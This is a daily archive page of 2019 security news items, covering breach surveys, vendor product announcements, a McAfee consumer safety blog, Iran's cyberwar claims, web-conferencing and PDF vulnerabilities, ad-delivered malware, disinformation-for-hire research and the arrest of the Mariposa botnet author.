Daily Archives: October 1, 2019

The 5 biggest examples of executive threats and how to prevent them

Many executives focus their security efforts and budgets solely on physical threats, but attacks targeting an executive’s digital presence can be just as dangerous. Criminals are looking to exploit the wealth of high-profile and high net-worth individuals—or cause them embarrassment or personal harm—at an unprecedented rate. And, as the most abundant source of company secrets and IP, they’re a primary attack vector of their businesses too. Attacks on VIPs involve attempts at accessing their sensitive … More

The post The 5 biggest examples of executive threats and how to prevent them appeared first on Help Net Security.

49% of infosec pros are awake at night worrying about their organization’s cybersecurity

Six in every ten businesses have experienced a breach in either in the last three years. At least a third of infosec professionals (36%) whose employers had not recently been a victim of a cyber attack also believe that it is likely that they are currently facing one without knowing about it. This may be an indicator of a bumper year for breaches, as the total number of organizations reporting breaches in 2018 only came … More

The post 49% of infosec pros are awake at night worrying about their organization’s cybersecurity appeared first on Help Net Security.

Massive uptick in eCrime campaigns, retail among top targeted industries

There has been a massive uptick in eCrime cyber activity, a CrowdStrike report reveals. As Gartner states in the 2019 Magic Quadrant for Endpoint Protection Platform, “The skills requirement of EDR solutions compounded by the skills gap in most organizations is an impediment to the adoption of EDR in the mainstream market. “As a result, product vendors are increasingly offering a fusion of products and services ranging from light incident response and monitoring through full … More

The post Massive uptick in eCrime campaigns, retail among top targeted industries appeared first on Help Net Security.

Aussies Fear Snakes, Spiders and Getting Hacked

Fears and phobias. We all have them. But what are your biggest ones? I absolutely detest snakes but spiders don’t worry me at all. Well, new research by McAfee shows that cybercriminals and the fear of being hacked are now the 5th greatest fear among Aussies.

With news of data breaches and hacking crusades filling our news feed on a regular basis, many of us are becoming more aware and concerned about the threats we face in our increasingly digital world. And McAfee’s latest confirms this with hackers making their way into Australia’s Top 10 Fears.

According to research conducted by McAfee, snakes are the top phobia for Aussies followed by spiders, heights and sharks. Cybercriminals and the fear of being hacked come in in 5th place beating the dentist, bees, ghosts, aeroplane travel and clowns!

Aussie Top 10 Fears and Phobias

  1. Snakes
  2. Spiders
  3. Heights
  4. Sharks
  5. Hackers/Cybercriminals
  6. The dentist
  7. Bees or wasps
  8. Ghosts
  9. Aeroplane travel
  10. Clowns

Why Do We Have Phobias?

Fears and phobias develop when we perceive that we are at risk of pain, or worse, still, death. And while almost a third of respondents nominated snakes as their number one fear, there is less than one-in-fifty thousand chance of being bitten badly enough by a snake to warrant going to hospital in Australia, according to research from the Internal Medicine Journal.

In contrast, McAfee’s analysis of more than 108 billion potential online threats between October and December 2018, identified 202 million of these threats as genuine risks. With a global population of 7.5 billion, that means there is approximately a one in 37 chance of being targeted by cybercrime. Now while this is not a life-threatening situation, these statistics show that chance of us being affected by an online threat is very real.

What Are Our Biggest Cyber Fears?

According to the research, 82% of Aussies believe that being hacked is a growing or high concern. And when you look at the sheer number of reported data breaches so far this year, these statistics make complete sense. Data breaches have affected Bunnings staff, Federal Parliament staff, Marriott guests, Victorian Government staff, QLD Fisheries members, Skoolbag app users and Big W customers plus many more.

Almost 1 in 5 (19%) of those interviewed said their top fear at work is doing something that will result in a data security breach, they will leak sensitive information or infect their corporate IT systems.

The fear that we are in the midst of a cyberwar is another big concern for many Aussies. Cyberwar can be explained as a computer or network-based conflict where parties try to disrupt or take ownership of the activities of other parties, often for strategic, military or cyberespionage purposes. 55% of Aussies believe that a cyberwar is happening right now but we just don’t know about it. And a fifth believe cyber warfare is the biggest threat to our nation.

What Can We Do to Address Our Fear of Being Hacked?

Being proactive about protecting your online life is the absolute best way of reducing the chances of being hacked or being affected by a data breach. Here are my top tips on what you can now to protect yourself:

  1. Be Savvy with Your Passwords

Using a password manager to create unique and complex passwords for each of your online accounts will definitely improve your online safety. If each on your online accounts has a unique password and you are involved in a breach, the hacker won’t be able to use the stolen password details to log into any of your other accounts.

  1. Stop AutoFill on Chrome

Storing your financial data within your browser and being able to populate online forms quickly within seconds makes the autofill function very attractive however it is risky. Autofill will automatically fill out all forms on a page regardless of whether you can see all the boxes. You may just think you are automatically entering your email address into an online form however a savvy hacker could easily design an online form with hidden boxes designed to capture your financial information. So remove all your financial information from Autofill. I know this means you will have to manually enter information each time you purchase but your personal data will be better protected.

  1. Think Before You Click

One of the easiest ways for a cybercriminal to compromise their victim is by using phishing emails to lure consumers into clicking links for products or services that could lead to malware, or a phoney website designed to steal personal information. If the deal seems too good to be true, or the email was not expected, always check directly with the source.

  1. Stay Protected While You Browse

It’s important to put the right security solutions in place in order to surf the web safely. Add an extra layer of security to your browser with McAfee WebAdvisor.

  1. Always Connect with Caution

I know public Wi-Fi might seem like a good idea, but if consumers are not careful, they could be unknowingly exposing personal information or credit card details to cybercriminals who are snooping on the network. If you are a regular Wi-Fi user, I recommend investing in a virtual private network or (VPN) such as McAfee’s Safe Connect which will ensure your connection is completely secure and that your data remains safe.

While it is tempting, putting our head in the sand and pretending hackers and cybercrime don’t exist puts ourselves and our families at even more risk! Facing our fears and making an action plan is the best way of reducing our worry and stress. So, please commit to being proactive about your family’s online security. Draw up a list of what you can do today to protect your tribe. And if you want to receive regular updates about additional ways you can keep your family safe online, check out my blog.

‘till next time.

Alex x

 

 

 

The post Aussies Fear Snakes, Spiders and Getting Hacked appeared first on McAfee Blogs.

Cyber risks are the top concern among businesses of all sizes

Cyber risks are the top concern among businesses of all sizes for the first time since the Travelers Companies’ survey began in 2014. Of the 1,200 business leaders who participated in the survey, 55% said they worry some or a great deal about cyber risks, ahead of medical cost inflation (54%), employee benefit costs (53%), the ability to attract and retain talent (46%) and legal liability (44%). As concerns about cyber threats have grown, a … More

The post Cyber risks are the top concern among businesses of all sizes appeared first on Help Net Security.

What’s next for 5G?

The future of 5G lies in the enterprise, states ABI Research. Use cases across different vertical markets, such as industrial automation, cloud gaming, private Long-Term Evolution (LTE), and smart transport systems, will become pervasive, and will unlock new opportunities for Mobile Service Providers (MSPs) along the way. This bright and lucrative future may be hampered by 5G’s past. That’s because early 5G implementations were designed to fit the needs of the consumer market first. “The … More

The post What’s next for 5G? appeared first on Help Net Security.

Titus Accelerator for Privacy reduces financial and legal risk exposure

Titus, the expert in data classification and a Blackstone portfolio company, announced Titus Accelerator for Privacy to reduce financial and legal risk exposure by automatically identifying personal data and applying protection. Unlike other data protection solutions, Titus Accelerator for Privacy examines emails and files at the point of creation. This unique solution takes advantage of machine learning to deliver a faster, more direct path to data privacy and compliance with cybersecurity policies and data privacy … More

The post Titus Accelerator for Privacy reduces financial and legal risk exposure appeared first on Help Net Security.

Revisiting and Revising Some Tips for National Cyber Security Awareness Month

As a regular reader of Tripwire, you are aware that October is National Cyber Security Awareness Month.  Way back in 2015, when the world was an entirely different place, I contributed an article that offered some tips for protecting yourself. Those tips are still relevant: Password management. This should be very old news, but the […]… Read More

The post Revisiting and Revising Some Tips for National Cyber Security Awareness Month appeared first on The State of Security.

How Will the CMMC Impact My Business and How Can We Prepare? Part 3 of 3

Combining Cyber Standards – Is ‘Unified’ Always A Good Approach? The CMMC enforcement model will require a significant adjustment to the way contractors conduct government business – from procurement to execution. In Part 2 of this series, I discussed the possible impacts of having your company’s security rating made public. In Part 3, I would like […]… Read More

The post How Will the CMMC Impact My Business and How Can We Prepare? Part 3 of 3 appeared first on The State of Security.

Avast Business Secure Internet Gateway reduces costs and delivers advanced protection

Avast, a leader in digital security products for business and consumers, announced the launch of Avast Business Secure Internet Gateway (SIG) for its customers. The cloud-based solution offers a global network of always-on security gateways designed to eliminate the many gaps in protection caused by legacy systems, on-premise security hardware, and Unified Threat Management (UTM) appliances. Avast Business SIG replaces traditional security appliances by delivering powerful, cloud-based protection capabilities as a simple-to-consume subscription service, breaking … More

The post Avast Business Secure Internet Gateway reduces costs and delivers advanced protection appeared first on Help Net Security.

Veriff launches NFC verification tool for biometric documents

Veriff, the most secure global verification service provider launches near-field communication (NFC) verification tool that enables the company to validate ePassport-compatible identity documents with both iOS and Android devices. Veriff now offers ePassports digital verification on all devices that support ePassports reading, including the most recent Android and iOS devices. The new tool speeds up the verification process, is user friendly and makes it more secure than photo-based verification. According to Kaarel Kotkas, Veriff CEO … More

The post Veriff launches NFC verification tool for biometric documents appeared first on Help Net Security.

Microchip’s Trust Platform provides secure key storage for low-, mid- and high-volume deployments

As the number and types of connected devices proliferates, market fragmentation and security vulnerabilities in the Internet of Things (IoT) have created significant challenges for developers. Hardware-based security is the only way to protect secret keys from physical attacks and remote extraction, but extensive security expertise, development time and costs are required to configure and provision each device. With companies producing anywhere from hundreds to millions of connected devices per year across the globe, scalability … More

The post Microchip’s Trust Platform provides secure key storage for low-, mid- and high-volume deployments appeared first on Help Net Security.

DataStax unveils Change Data Capture Connector for Apache Kafka

DataStax, the company behind the leading database built on Apache Cassandra, announced early access to the DataStax Change Data Capture (CDC) Connector for Apache Kafka. The DataStax CDC Connector for Apache Kafka gives developers bidirectional data movement between DataStax, Cassandra, and Kafka clusters. CDC is designed to capture and forward insert, update, and delete activity applied to tables (column families). The DataStax CDC Connector for Apache Kafka makes it easier for developers to build globally … More

The post DataStax unveils Change Data Capture Connector for Apache Kafka appeared first on Help Net Security.

AWS IQ enhances customers’ connection and collaboration with AWS-Certified third party experts

Amazon Web Services, an Amazon.com company, announced the general availability of AWS IQ, a new service that helps customers quickly find, engage, and do business with AWS-Certified third party experts for on-demand project work. AWS IQ offers the tools and workspace for more secure collaboration, streamlined project tracking, and integrated billing. To get started, customers simply log into AWS IQ and describe their project needs in a few sentences. They can then chat with experts … More

The post AWS IQ enhances customers’ connection and collaboration with AWS-Certified third party experts appeared first on Help Net Security.

Fusion Risk Management expands its Fusion Framework System platform

Fusion Risk Management, a leading provider of business continuity and risk management software and services, announces the expansion of its flagship platform, Fusion Framework System, to include an advanced set of risk management capabilities for comprehensive management of risk and business continuity. With this release, Fusion Framework enables greater operational resilience by supporting the full risk and continuity spectrum that today’s businesses need. The platform eliminates the need for separate modules across the many areas … More

The post Fusion Risk Management expands its Fusion Framework System platform appeared first on Help Net Security.

Continuum adds new managed detection and response capabilities to its Fortify solution

Continuum, the Platform for What’s Next, announced that it is expanding its Fortify solution with new managed detection and response (MDR) capabilities. Additionally, Continuum will add Fortify for the MSP, specifically to help Managed Service Providers (MSP) protect themselves, given the growing trend of cyber attackers seeking to target and weaponize MSPs. The new MDR enhancements, powered by Fortinet, will help MSPs streamline their cybersecurity processes and better protect their customers with automated correlation across … More

The post Continuum adds new managed detection and response capabilities to its Fortify solution appeared first on Help Net Security.

Teheran: U.S. has started ‘Cyber War’ against Iran

Iran ’s Passive Defense Organization chief Gholamreza Jalali declared that the US government has started its cyber war against the country.

Gholamreza Jalali, Iran’s Passive Defense Organization chief, announced that that “America has started its cyber war against Iran, without providing more details.

The news was reported by the ISNA news website on October 1, Jalali also added that Iran “decisively will resort to cyber defense.”

Jalali is an Islamic Revolution Guard Corps (IRGC) brigadier general, in November 2018 he announced that government experts have uncovered and neutralized a new strain of Stuxnet.

“Recently we discovered a new generation of Stuxnet which consisted of several parts … and was trying to enter our systems,” Jalali was quoted as saying by the semi-official ISNA news agency at a news conference marking Iran’s civil defense day

In May, Jalali had accused the U.S. of carrying out psyops operations through social media aimed at influencing Iranians’ sentiment on specific topics. The official also revealed that Iran is targeted by 50,000 cyberattacks, the cyber defense of the country suffers eight major attacks annually.

Last week, Iran’s oil minister, Bijan Namdar Zanganeh, ordered companies operating in the energy sector to be on ‘full alert’ to the threat of “physical and cyber” attacks.

“it is necessary for all companies and installations the oil industry to be on full alert against physical and cyber threats,” reads a statement published on the oil ministry’s Shana website.

Iran fears a retaliation of Western countries that are accusing it to carry out physical and cyber attacks against their infrastructure and countries in the Middle East.

Military and intelligence experts believe that western coalition, driven by the US could carry out a series of cyber attacks against Iranian critical infrastructure. A few days after the drone attacks, some western media reported destructive cyber attacks against infrastructures in the Iranian oil sector, but Iran denied it.

Pierluigi Paganini

(SecurityAffairs – Iran, cyberwar)

The post Teheran: U.S. has started ‘Cyber War’ against Iran appeared first on Security Affairs.

Prying-Eye Vulnerability Exposes Online Meetings to Snooping

Prying-Eye Vulnerability Exposes Online Meetings to Snooping

Web-conferencing users who don't assign passwords could be having online meetings with more people than they think, according to new research.

The Cequence CQ Prime Threat Research team today announced its discovery in July 2019 of a vulnerability in the Cisco Webex and Zoom video-conferencing platforms that potentially exposes millions of online meetings to snooping.  

By launching an enumeration attack that targets web-conferencing APIs with a bot that cycles through (enumerates) and discovers valid numeric meeting IDs, threat actors could exploit the vulnerability to view and listen to active meetings that haven't been protected by a password. 

"In targeting an API instead of a web form fill, bad actors are able to leverage the same benefits of ease of use and flexibility that APIs bring to the development community," said Shreyans Mehta, Cequence Security CTO and co-founder. 

"In the case of the Prying-Eye vulnerability, users should embrace the shared responsibility model and take advantage of the web-conferencing vendors’ security features to not only protect their meetings but also take the extra step of confirming the attendee identities."

Following best practices on vulnerability disclosures, the CQ Prime team notified the impacted vendors and gave them time to validate and respond to the findings.

Richard Farley, CISO of Zoom Video Communications, Inc., said: "Zoom has improved our server protections to make it much harder for bad actors or malicious bots to troll for access into Zoom meetings. In addition to our detection and prevention mechanisms in the data center, we provide meeting hosts with extensive protection controls, such as preventing attendees from joining a meeting before the host, and the very popular waiting room feature."

The Cisco Product Security Incident Response Team (PSIRT) issued an informational security advisory to its Webex customers, but said it "is not aware of any malicious exploitation of this potential attack scenario."

PSIRT said: "Cisco Webex provides the host with controls that protect the meeting—such as disallowing join before host, locking a meeting, as well as ensuring guests do not join without authentication."

Passwords are enabled as a default setting for meetings on both the Zoom and Cisco Webex platforms. However, users who are in the mood to live dangerously have the option to make meetings on both platforms password-free. 

Singapore presented the Operational Technology (OT) Cybersecurity Masterplan

The Cyber Security Agency of Singapore (CSA) presented the Operational Technology (OT) Cybersecurity Masterplan to increase the resilience of Critical Information Infrastructure (CII) sectors.

The Cyber Security Agency of Singapore (CSA) presented the Operational Technology (OT) Cybersecurity Masterplan to enhance the security and resilience of Singapore’s Critical Information Infrastructure (CII) sectors in delivering essential services.

Operational Technology (OT) systems are becoming a privileged target for highly-sophisticated threat actors, for this reason, CSA is going to propose measures to increase the resilience of these systems to cyber attacks.

“The Masterplan serves to improve cross-sector response to mitigate cyber threats in the OT environment and to strengthen partnerships with industry and stakeholders.” reads the announcement published by the CSA. “The OT Cybersecurity Masterplan outlines key initiatives covering the areas of People, Processes and Technology to uplift the of our CII owners and that operate OT systems.”

Singapore is one of the most hyper-connected commercial hub, for this reason, it is essential to adopt all the necessary countermeasures to repeal any kind of attack.

Key point in the OT Cybersecurity Masterplan include:

  1. Providing OT cybersecurity training to develop human capabilities
  2. Facilitating the sharing of information through an OT Information Sharing and Analysis Centre (OT-ISAC)
  3. Strengthening OT owners’ policies and processes through the issuance of an OT Cybersecurity Code of Practice (CCoP)
  4. Adopting technologies for cyber resilience through Public-Private Partnerships

The Masterplan encourages OT equipment manufacturers and service providers to implement the best cybersecurity practices by design.

“The OT Cybersecurity Masterplan will serve as a strategic blueprint to guide Singapore’s efforts to foster a resilient and secure cyber environment for our OT CII, while taking a balanced approach between security requirements, rapid digitalisation and ease of conducting business-as-usual activities.” concludes the announcement.

The Singapore OT Cybersecurity Masterplan is available at the following URL:

https://www.csa.gov.sg/~/media/csa/documents/publications/ot_masterplan/otcybersecuritymasterplan.pdf

Pierluigi Paganini

(SecurityAffairs – Cybersecurity Masterplan, Operational Technology)

The post Singapore presented the Operational Technology (OT) Cybersecurity Masterplan appeared first on Security Affairs.

Publishers Targeted by GhostCat Malware

Publishers Targeted by GhostCat Malware

A malicious campaign that waged 13 attacks against hundreds of well-known publishers has been identified and put down by The Media Trust.  

Rather appropriately for the Halloween season, the malware was given the name GhostCat-3PC by researchers in the Trust's Digital Security & Operations (DSO) team. 

GhostCat-3PC ran behind an ad that used advanced, obfuscated code and delivery patterns to evade detection by the traditional signature-based ad blockers used by many of the publishers. 

After a quick prowl to check if the user was on a list of targeted domains, GhostCat would initiate a fraudulent pop-up that, if clicked, led to malicious content. 

The team discovered the malware in late August and observed it escalate its attack until well into September.

"What makes GhostCat-3PC unique is the scale of this highly orchestrated campaign, the sophistication of obfuscation techniques to outsmart security tools, and what appears to be an attempt to test and track the response of signature-based security defenses," Mike Bittner, The Media Trust's associate director of digital security and operations, told Infosecurity Magazine.

"Bad actors behind GhostCat-3PC know what blockers are present in these publications and are likely using these attacks as a kind of stress test to determine the risk of being discovered and impeded."

In a report published today, the DSO researchers explained how the creators of GhostCat hid malicious code inside seemingly innocuous code to get the malware past ad blockers. 

The researchers wrote: "Most blockers work by detecting known malicious signatures found in an ad tag or on a publisher site. These signatures are typically static in nature and therefore must result in an exact match to the malicious code in order to be successful. Any change to the targeted code, no matter how minor, will prevent the blocker from producing a match to the specified signature."

The Media Trust sees an average of 1,000 active, unrelated incidents in any 24-hour period, and more than 170 newly minted malicious domains each day. 

Asked how new ad blockers need to be to have any kind of effect against this continually evolving threat, Bittner told Infosecurity Magazine: "Pre-2019 blockers would be useless.

"Signature-based defenses like conventional blockers will have to update their keyword blocklists many times each day just to keep up with bad actors’ relentless assault. Just this past month, five premium publishers using conventional blocking solutions have had at least one major incident unrelated to GhostCat-3PC."

Researchers Find New Hack to Read Content Of Password Protected PDF Files

Looking for ways to unlock and read the content of an encrypted PDF without knowing the password? Well, that's now possible, sort of—thanks to a novel set of attacking techniques that could allow attackers to access the entire content of a password-protected or encrypted PDF file, but under some specific circumstances. Dubbed PDFex, the new set of techniques includes two classes of attacks

Forrester names Microsoft a Leader in 2019 Endpoint Security Suites Wave

As we continue as a company to empower every person on the planet to achieve more, we keep delivering on our mission through products that achieve the highest recognition in the industry. For the last several years we’ve been working hard to provide the leading endpoint security product in the market.

Today, we are proud to announce that Microsoft is positioned as a leader in The Forrester Wave™: Endpoint Security Suites, Q3 2019, receiving among the second highest scores in both the strategy and market presence categories. According to Forrester, “Microsoft has a compelling vision for the future where endpoint threat prevention and detection are completely integrated and inseparable.”

We believe this latest recognition represents our ability to provide best-in-class protection and deliver on innovations that learn and evolve to keep pace with today’s threat landscape.

 

This recognition comes at a great point in our evolution journey. We are guided by a strong vision to provide the industry-best protection and we are committed to continue pushing the limits in protection, detection, and response capabilities to secure our customers.

Download this complimentary full report and read the analysis behind Microsoft’s positioning as a Leader.

For more information on our endpoint protection platform, or to sign up for a trial, visit our Microsoft Defender Advanced Threat Protection (ATP) page.

The Forrester Wave™: Endpoint Security Suites, Q3 2019, Chris Sherman, September 23, 2019.

This graphic was published by Forrester Research as part of a larger research document and should be evaluated in the context of the entire document. The Forrester document is available upon request from https://reprints.forrester.com/#/assets/2/108/RES146636/reports

 

 

The post Forrester names Microsoft a Leader in 2019 Endpoint Security Suites Wave appeared first on Microsoft Security.

Canadian government data is getting cloudier, signaling a ‘massive leap of faith’ in public cloud, says Microsoft

The Canadian government’s ongoing effort to adopt the public cloud took another step forward this summer with the help of Microsoft and AWS, representing a “massive leap of faith” in cloud security, according to Peter Melanson, director of federal sales at Microsoft Canada.

“We’re talking about internal workloads of government data…things like human resources systems and financial systems,” he said, referring to the types of workloads the federal government is moving to public cloud.

These workloads fall under the Protected B classification, which according to the Department of Justice, is described as “information where unauthorized disclosure could cause serious injury to an individual, organization or government.” Protected B includes medical information, information protected by solicitor-client or litigation privilege, or received in confidence from other government departments and agencies.

The migration to public cloud is part of the government’s Cloud First Strategy. In 2017, the federal government started to migrate unclassified data to public cloud storage, with the goal to eventually store its Protected B workloads in the same environment as well.

Unsurprisingly, any vendor bidding for the contracts to store these workloads has to clear a high bar. There are 469 separate security controls, as outlined by the Canadian Cyber Security Centre, that the government has to follow, explained Melanson.

“They want to make certain that you are compliant before they put these very intimate workloads up into the public cloud,” indicated Melanson.

It’s not much of a surprise then that the SCC selected Azure and AWS, two of the big three public cloud providers, to host its Protected B data.

In April 2019, Shared Services Canada (SSC) signed an enterprise agreement with Microsoft Canada that will provide client departments with access to Microsoft 365. On Aug. 8, SSC signed Cloud Framework Agreements with AWS Canada and Microsoft Azure. The two have various other contracts with the federal government when it comes to hosting some of its unclassified data, a lot of which is done through channel partners.

The two vendors have done a lot over the years to quell the public sector’s fears around public cloud security, indicated a spokesperson for SSC.

“Initial reservations of migrating data to the cloud were based primarily upon concerns about cloud security features. Over the past few years, cloud computing and storage have matured significantly,” they wrote in an email. “The Cloud First Strategy aligns Canada with Australia, New Zealand, United Kingdom and the United States.”

Quoting Sean Roche, the associate deputy director for digital innovation at the Central Intelligence Agency, Rejean Bourgault, country manager for public sector at AWS Canada, emphasized the acceptance of cloud security among governments.

“On its weakest day, the cloud is more secure than a client service solution,” Bourgault recited. “On a global basis, AWS has more than 5,000 government agencies using AWS at all classification levels…all the way up to Top Secret.”

Russian Underground Sells Disinformation Services to Influence Western Media

Russian Underground Sells Disinformation Services to Influence Western Media

Engaging threat actors to launch a disinformation campaign in the Western media is "alarmingly simple and inexpensive" according to a new report.

Using the Recorded Future platform, Insikt Group researchers set up a fake company located in a Western country to gain insight into the chilling world of disinformation. Researchers then hired two sophisticated disinformation vendors, which they found on a Russian-speaking underground forum, to influence public perception of the fictitious company.

The first vendor, given the code name Raskolnikov in the report (presumably as a nod to Dostoevsky's protagonist in Crime and Punishment), was engaged to paint a positive picture of the company. The second vendor, code-named Doctor Zhivago, was hired to destroy the reputation of the company, which was code-named Tyrell Corporation in the report. 

Researchers were able to launch a customizable month-long media campaign with each vendor for only a few thousand dollars. Services ranged from $8 for a social media post to $1,500 for SEO services and traditional media articles.

Raskolnikov created accounts for Tyrell Corporation on major Western social media platforms and gathered over 100 followers on each account. They offered a price list for sharing content on 45 websites, including ft.com, thelondoneconomic.com, eveningexpress.co.uk, and thefintechtimes.com.  

Insikt Group researchers said: "In two weeks, the Tyrell Corporation was in the 'news'—one of the media sources was a less established media outlet, though the other was a very reputable source that had published a newspaper for nearly a century."

Doctor Zhivago claimed to work with a team that included journalists, editors, translators, search engine optimization (SEO) specialists, and hackers. The threat actor used social media to spread claims that Tyrell Corporation had manipulated employees, and even offered to file a complaint against the company for its supposed involvement in human trafficking. 

Researchers said: "First, a group of older accounts—referred to as 'aged accounts'— that posted links to the articles they had published in media sources was employed. Then, a new batch of accounts that reposted content from the aforementioned aged accounts to amplify the messages was used. 

"These new accounts befriended citizens living in the same country the Tyrell Corporation was located in to make the campaign more effective by targeting the audience."

Commenting on the research, Roman Sannikov, head of analyst services at Recorded Future, told Infosecurity Magazine: "We were surprised by how professional the vendors seemed to be. They provided much better customer service than your typical underground threat actor. They were there to provide us with advice on how we should carry out the campaigns and were very responsive to our questions and requests."

Asked how the research has shaped his view of the world, Sannikov said: "I think we already suspected that this was going on, though the fact that these threat actors were able to carry out the campaigns so quickly, inexpensively, and effectively in the West was certainly jarring.

"It underscores how important this issue is, not only when it comes to the public sector, but for private companies and individuals as well. We hope that our research will open people's eyes to this problem before it becomes pervasive outside of the vendors' traditional markets of Russian-speaking countries and Eastern Europe."

Mariposa Botnet Author, Darkcode Crime Forum Admin Arrested in Germany

A Slovenian man convicted of authoring the destructive and once-prolific Mariposa botnet and running the infamous Darkode cybercrime forum has been arrested in Germany on request from prosecutors in the United States, who’ve recently re-indicted him on related charges.

NiceHash CTO Matjaž “Iserdo” Škorjanc, as pictured on the front page of a recent edition of the Slovenian daily Delo.si, is being held by German authorities on a US arrest warrant for operating the destructive “Mariposa” botnet and founding the infamous Darkode cybercrime forum.

The Slovenian Press Agency reported today that German police arrested Matjaž “Iserdo” Škorjanc last week, in response to a U.S.-issued international arrest warrant for his extradition.

In December 2013, a Slovenian court sentenced Škorjanc to four years and ten months in prison for creating the malware that powered the ‘Mariposa‘ botnet. Spanish for “Butterfly,” Mariposa was a potent crime machine first spotted in 2008. Very soon after its inception, Mariposa was estimated to have infected more than 1 million hacked computers — making it one of the largest botnets ever created.

An advertisement for the ButterFly Bot.

Škorjanc and his hacker handle Iserdo were initially named in a Justice Department indictment from 2011 (PDF) along with two other men who allegedly wrote and sold the Mariposa botnet code. But in June 2019, the DOJ unsealed an updated indictment (PDF) naming Škorjanc, the original two other defendants, and a fourth man (from the United States) in a conspiracy to make and market Mariposa and to run the Darkode crime forum.

More recently, Škorjanc served as chief technology officer at NiceHash, a Slovenian company that lets users sell their computing power to help others mine virtual currencies like bitcoin. In December 2017, approximately USD $52 million worth of bitcoin mysteriously disappeared from the coffers of NiceHash. Slovenian police are reportedly still investigating that incident.

The “sellers” page on the Darkode cybercrime forum, circa 2013.

It will be interesting to see what happens with the fourth and sole U.S.-based defendant added in the latest DOJ charges — Thomas K. McCormick, a.k.a “fubar” — allegedly one of the last administrators of Darkode. Prosecutors say McCormick also was a reseller of the Mariposa botnet, the ZeuS banking trojan, and a bot malware he allegedly helped create called “Ngrbot.”

Between 2010 and 2013, Fubar would randomly chat me up on instant messenger apropos of nothing to trade information about the latest goings-on in the malware and cybercrime forum scene.

Fubar frequently knew before anyone else about upcoming improvements to or new features of ZeuS, and discussed at length his interactions with Iserdo/Škorjanc. Every so often, I would reach out to Fubar to see if he could convince one of his forum members to call off an attack against KrebsOnSecurity.com, an activity that had become something of a rite of passage for new Darkode members.

On Dec. 5, 2013, federal investigators visited McCormick at his University of Massachusetts dorm room. According to a memo filed by FBI agents investigating the case, in that interview McCormick acknowledged using the “fubar” identity on Darkode, but said he’d quit the whole forum scene years ago, and that he’d even interned at Microsoft for several summers and at Cisco for one summer.

A subsequent search warrant executed on his dorm room revealed multiple removable drives that held tens of thousands of stolen credit card records. For whatever reason, however, McCormick wasn’t arrested or charged until December 2018.

According to the FBI, back in that December 2013 interview McCormick voluntarily told them a great deal about his various businesses and online personas. He also apparently told investigators he talked with KrebsOnSecurity quite a bit, and that he’d tipped me off to some important developments in the malware scene. For example:

“TM had found the email address of the Spyeye author in an old fake antivirus affiliate program database and that TM was able to find the true name of the Spyeye author from searching online for an individual that used the email address,” the memo states. “TM passed this information on to Brian Krebs.”

Read more of the FBI’s interview with McCormick here (PDF).

Duo and ISE Integrated Use Case – Delivering Zero Trust security for the workforce and workplace

This blog series will highlight exciting new developments and integrations between solutions within the Cisco Security portfolio with our acquisition of Duo Security. These posts will cover details about the problems that are being solved by these integrations with links to helpful technical documentation if you are interested in seeing for yourself the benefits that are provided. If you would like further information on how you can improve your security posture by leveraging these integrations, please contact our sales team.

Zero trust is a comprehensive security approach that secures access by your users, devices, applications and networks. This approach to security helps organizations implement practices that establish trust in the users and devices accessing sensitive applications and network resources, helping to prevent unauthorized access and reducing the risk of an attacker’s lateral movement through the network. ​

To protect the workforce, a zero trust security approach ensures only the right users and secure devices can access applications. And for the workplace, it secures all user and device connections across the network, including IoT. The integrations provided between Duo Security and Cisco’s Identity Services Engine (ISE) provide zero trust application and network access controls you need for the workforce and workplace. ​

Use Case 1: Zero trust remote access

ISE and the AnyConnect Secure Mobility Client empowers your mobile workforce with secure Virtual Private Network (VPN) access to the workplace. By integrating with Duo, you gain enhanced device visibility and multi-factor authentication (MFA) and establishing device trust. ​

Problem Solved: Customers who want to implement additional verification of the user when providing access to their corporate network via VPN. The motivators behind this requirement are:

  • VPN access provides end users with access to the entire network, many environments do not have the network segmentation robust policy to provide access to only the resources users need. Next best step for protection is to implement MFA to achieve higher level of confidence the user is who they say they are.
  • Credential compromise is still one of the biggest reasons customers get breached
  • Compliance (HIPAA, PCI-DSS etc.)

Solution: You can enhance remote access security with Duo Security, Cisco ISE, and the AnyConnect Secure Mobility Client. It’s easy to add multi-factor authentication to VPN access so that you can verify the trust in remote users. Here’s how:

Cisco AnyConnect Client + Cisco ASA utilizes Cisco ISE for Access Control. Customers add the Duo Authentication Proxy as a 2nd authentication source in the Cisco ISE. Upon AnyConnect login users are prompted for 2FA from Duo.

Use Case 2: Zero trust network administration.

ISE controls network administrator access to critical network infrastructure equipment like switches and routers with the added security layer of Duo’s multi-factor authentication to mitigate the risks of unauthorized access which could result in intentional misconfigurations that cause severe network outages.​

Problem Solved: Most customers have network devices (Routers, Switches etc) in their environments which require access to manage and configure. Many of these network devices utilize a Cisco protocol called TACACS+  to authenticate and authorize end user admin access to the network device. Customers want to enable MFA for admin access to these network devices.

Solution: With the Duo MFA Integration with ISE for TACACS+ Device Administration with Microsoft Active Directory Users customers can protect admin access to network devices which utilize the TACACS+ protocol for primary authentication to ISE and 2FA with Duo by utilizing the Duo Authentication Proxy.  

Stay tuned for more integration stories and use cases. You can learn more about Cisco Zero Trust here, and if you want to see the powerful security controls that Duo offers you can sign-up for a free trial at sign-up.duo.com .

Find What Your Endpoint Anti-Malware is Missing with CESA Built on Splunk

There are many aspects to securing an endpoint beyond finding the malware on it.  What do you know about the behavior of your endpoints? Can you track anomalous traffic? Can you tell what the applications and other software processes are up to?  What is happening when the device is off the corporate network? Has a user or device evaded endpoint security measures? With insight to such issues, you can generate visibility that not only follows endpoints on and off network, but also finds threats often not addressed by anti-malware solutions.

 

With this in mind, Cisco has created a solution unlike anything available in the industry today — Cisco Endpoint Security Analytics (CESA) Built on Splunk. This new solution brings together the unparalleled endpoint behavioral visibility of Cisco’s AnyConnect Network Visibility Module (NVM) and the data transformation power of the Splunk analytics platform. The result is an added layer of deep endpoint visibility that transforms endpoint-centric data into insights to proactively detect and mitigate network threats.

If you already use AnyConnect NVM, you know it creates a lot of detailed, endpoint-specific data. But by building and productizing CESA on top of Splunk, we’ve paired that data with an equally comprehensive and cost-effective analytics tool. CESA addresses endpoint security use cases such as:

  • Unapproved applications and SaaS visibility
  • Endpoint security evasion
  • Attribution of user to device to application to traffic and destination
  • Zero-trust monitoring
  • Data loss detection
  • Day-zero malware and threat hunting
  • Asset inventory

